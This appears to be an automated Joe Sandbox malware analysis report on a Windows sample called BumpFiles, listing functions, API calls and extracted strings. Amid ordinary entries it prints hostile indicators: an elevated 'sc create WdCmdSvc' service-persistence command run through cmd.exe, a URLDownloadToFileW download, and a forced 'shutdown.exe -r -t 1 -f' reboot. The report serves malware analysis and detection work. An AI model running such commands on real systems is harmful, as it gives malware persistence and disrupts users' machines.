Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a6815cf048d2a75c8910397385a2ca880fdec26ab6423f402ba9e5d1119bb45e
Instruction ID: 11846b2a77938f10269bbea534853d16cf35a90d37f20fdb129f70d6c98cb005
Opcode Fuzzy Hash: a6815cf048d2a75c8910397385a2ca880fdec26ab6423f402ba9e5d1119bb45e
Instruction Fuzzy Hash: 2E71B035604A008BD715DB29C888B17BBD5EF86314F18C1BFE888AB3D2D6B89C41DF95

Uniqueness

Uniqueness Score: -1.00%

Function 005EDEA4 Relevance: 10.6, APIs: 7, Instructions: 105
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005EDEB8
IsWindowUnicode.USER32 ref: 005EDECC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDEEF
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDF05
TranslateMessage.USER32 ref: 005EDF8A
DispatchMessageW.USER32 ref: 005EDF97
DispatchMessageA.USER32 ref: 005EDF9F

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
Instruction ID: 1e2ffcf5faaac0e623271d00fe91a0f5e8c3699351e3eb57bdfabddf9ae2a005
Opcode Fuzzy Hash: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
Instruction Fuzzy Hash: 86210A30B547C065EA39B52B0C06BFEAFB96FD6704F14451DF4E29B2C2DA9D9C424236

Uniqueness

Uniqueness Score: -1.00%

Function 00633BD8 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30

Strings

cmd.exe, xrefs: 00633C24
" start= auto, xrefs: 00633C09
/C sc create WdCmdSvc binPath= ", xrefs: 00633C01
runas, xrefs: 00633C29
:c, xrefs: 00633BD8

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: ExecuteShell
String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas$:c
API String ID: 587946157-4108604376
Opcode ID: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
Instruction ID: 319b91e3220b3ab50859801b3322155d411d05b55362160aac4d9e6ad888e803
Opcode Fuzzy Hash: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
Instruction Fuzzy Hash: E7F0C230684314BFE701EB95CD83F9DFBBAEB45B10FA2007AB500B27C1D6786B108659

Uniqueness

Uniqueness Score: -1.00%

Function 00405968 Relevance: 9.0, APIs: 7, Instructions: 298
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 00405A1F
Sleep.KERNEL32(0000000A,00000000), ref: 00405A35
Sleep.KERNEL32(00000000), ref: 00405A63
Sleep.KERNEL32(0000000A,00000000), ref: 00405A79

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
Instruction ID: bdf7a1556342557ed6c5260c20dac2f68fef6da929d48900eeb6b1868b291bfe
Opcode Fuzzy Hash: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
Instruction Fuzzy Hash: CEC11476605B118BD715CF29E884317BBA2EB86310F1882BFD459AF3D5C3B4A881CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00633A38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
sleepfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6

Strings

dWe, xrefs: 00633AB2
hWe, xrefs: 00633A91, 00633AA5

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep$DownloadFile
String ID: dWe$hWe
API String ID: 2087964873-58362703
Opcode ID: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
Instruction ID: e38bbcdaf700aa6aab6cb9e7a4f3a98896630684cfae030678e04ef5b335f524
Opcode Fuzzy Hash: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
Instruction Fuzzy Hash: 62113D74600204AFD700EB55C892E8D77B5EF4A344F504076F504AB3E2D779AE019A99

Uniqueness

Uniqueness Score: -1.00%

Function 0063586C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898

Strings

C:\WINDOWS\system32\shutdown.exe -r -t 1 -f, xrefs: 00635889
:c, xrefs: 0063586C

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep$Exec
String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f$:c
API String ID: 1325486322-1912651170
Opcode ID: 9084fd4ac988e11f2c88bee64eed603d8c020462e05fad206a0e38efbd5631f5
Instruction ID: f61db4da6c67bcbcc9485dc9ace913e51ddd331a7a87c05aa1dac2d289d3923f
Opcode Fuzzy Hash: 9084fd4ac988e11f2c88bee64eed603d8c020462e05fad206a0e38efbd5631f5
Instruction Fuzzy Hash: ABD01230794B507DF11266667C23F197B4DD38AF14FD30466F601555D195B9641044ED

Uniqueness

Uniqueness Score: -1.00%

Function 0042547C Relevance: 7.5, APIs: 5, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254CC

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
String ID:
API String ID: 2814369299-0
Opcode ID: 52b62b36ed035377a1cc14c9da3cf4576dfee31e94e5de9ac3c5267e47e7e224
Instruction ID: ced7317d0bb7603919c6f65922b20b3b5ec63e78df0876d40d037117c1771166
Opcode Fuzzy Hash: 52b62b36ed035377a1cc14c9da3cf4576dfee31e94e5de9ac3c5267e47e7e224
Instruction Fuzzy Hash: 44F08261301B2019A91035BE28C1BBF51488DC276FB94073BF944D2292D92D4C86419E

Uniqueness

Uniqueness Score: -1.00%

Function 005EE0E8 Relevance: 3.1, APIs: 2, Instructions: 104COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 005EE1C9
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005EE1E0

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
Instruction ID: 49b3cee1a357ac9e4b63db1826b3323ea065a8a199be338292a45e01145cc57d
Opcode Fuzzy Hash: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
Instruction Fuzzy Hash: AA418234A04684EFDB18CF69C886A9DBBF6FB49300F6185E5E850A7391C7349E41DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D693
GetSystemDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D6BB

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
Instruction ID: dba43ac39d730306daca4e1ada09fe9982239cc22dcd487a1f983162ddf5979f
Opcode Fuzzy Hash: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
Instruction Fuzzy Hash: 4231FE34E042099BDB10EBE5C881BAEB7B5AB48308F50487BE414B73D1DB79AD49CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004FBC54 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004FBC79

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 62b0111acc6d7500fee279ba086fabc795d41589a45b3604784586583c8a09a5
Instruction ID: cfc2e6f8fefccddeca35f4d7415591228e66a85ecad90ab14efd8280bdd51e8a
Opcode Fuzzy Hash: 62b0111acc6d7500fee279ba086fabc795d41589a45b3604784586583c8a09a5
Instruction Fuzzy Hash: B6F0AF367040454BDB147A79C8445BE72D2DB82365F05853FF680D7391DB698C82C799

Uniqueness

Uniqueness Score: -1.00%

Function 00407CFB Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,00407D6A,?,?,?,00000000), ref: 00407D49

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
Instruction ID: 875274e2c4264f451e6ad1d12119ad3db8eed83e6ea6ef1fa48c92378bfb3a92
Opcode Fuzzy Hash: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
Instruction Fuzzy Hash: E5F0AF756486447EDB11F779CC82E5E73ACDF88704B2104BAF400F2292E6BD5E04962A

Uniqueness

Uniqueness Score: -1.00%

Function 00424AA8 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,00000000,?,00492358,004B577C,00000000,004B57FC,?,?,00492358), ref: 00424AF7

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9ecc51064a450b2074c856a3397e67820b78e609e57d340f9dfba975a6b0ee07
Instruction ID: e2f9c666573fb2808d607b15e87b5e3c477fa8a4b1fd6f0362a75845dbd106c2
Opcode Fuzzy Hash: 9ecc51064a450b2074c856a3397e67820b78e609e57d340f9dfba975a6b0ee07
Instruction Fuzzy Hash: 2AE02BF2B401202EF360759EACC1B0B914EC7D6775F160132F304E72C2D4D88C0142AC

Uniqueness

Uniqueness Score: -1.00%

Function 00424B00 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,00492358,004B5711,00000000,004B57FC,?,?,00492358), ref: 00424B49

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b2d8e0899d24d89a908864b73a35a3fcbe6edd53455a76d7d404e430976054b4
Instruction ID: 25a1fbbc8100fa346d3677f3a20588944441c3efe3b912ced1bbf1de9f64e288
Opcode Fuzzy Hash: b2d8e0899d24d89a908864b73a35a3fcbe6edd53455a76d7d404e430976054b4
Instruction Fuzzy Hash: 5FE0DFE7B001242AF35079AEAC82F6B914DCB927B9F060236FB10EB2C1D458DC0182E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C498 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040C4B6

Part of subcall function 0040D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
Part of subcall function 0040D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
Instruction ID: 3a4ae58969193307bce1041edd5d9d761091ef52682c61390113b32e0b793339
Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
Instruction Fuzzy Hash: 92E0ED71A00310DBCB10DFA8D8C5A5737E4AB08754F0446A6ED14DF386D375DD1487D5

Uniqueness

Uniqueness Score: -1.00%

Function 004258EC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
